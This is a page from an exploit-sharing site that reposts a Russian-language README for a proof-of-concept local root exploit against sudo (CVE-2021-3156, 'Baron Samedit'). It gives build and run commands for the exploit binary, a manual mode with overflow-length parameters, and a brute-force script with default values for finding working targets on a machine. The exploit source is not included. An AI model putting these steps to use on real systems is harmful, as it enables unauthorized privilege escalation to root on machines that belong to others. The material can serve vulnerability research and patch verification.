Sploitus

Exploit for CVE-2021-3156

kitploit · 2026-08-27

Exploit Code

MARKDOWN75 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BLASTY-CVE-2021-3156
# CVE-2021-3156 PoC

## Введение

Это эксплойт для уязвимости sudo `CVE-2021-3156` (названной Baron Samedit компанией Qualys).

## Использование

сборка:

root@kitploit:~
    
    
    $ make
    

список целей:

root@kitploit:~
    
    
    $ ./sudo-hax-me-a-sandwich
    

запуск:

root@kitploit:~
    
    
    $ ./sudo-hax-me-a-sandwich <target_number>
    

ручной режим:

root@kitploit:~
    
    
    $ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
    

## Поиск целей методом перебора (экспериментальный)

Убедитесь, что у вас установлен GNU parallel.

root@kitploit:~
    
    
    $ make brute
    $ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
    

некоторые значения по умолчанию для проб:

root@kitploit:~
    
    
    $ ./brute.sh 90 120 50 70 150 300
    

Съест все доступные ядра. Не пытайтесь смотреть Netflix и одновременно использовать брутфорс.

## Вклад

Присылайте (разумные) пул-реквесты, возможно, я их смержу.

Некоторые идеи:

  * Больше целей
  * Поиск целей
  * Другие стратегии эксплуатации
  * Больше автономной функциональности: 
    * Встраивание общей библиотеки hax.c (Сделайте её маленькой, пожалуйста, ELF-гольф + asm-заглушка setuid/execve)
    * Добавление логики mkdir в hax.c
  * Очистка каталогов/общих библиотек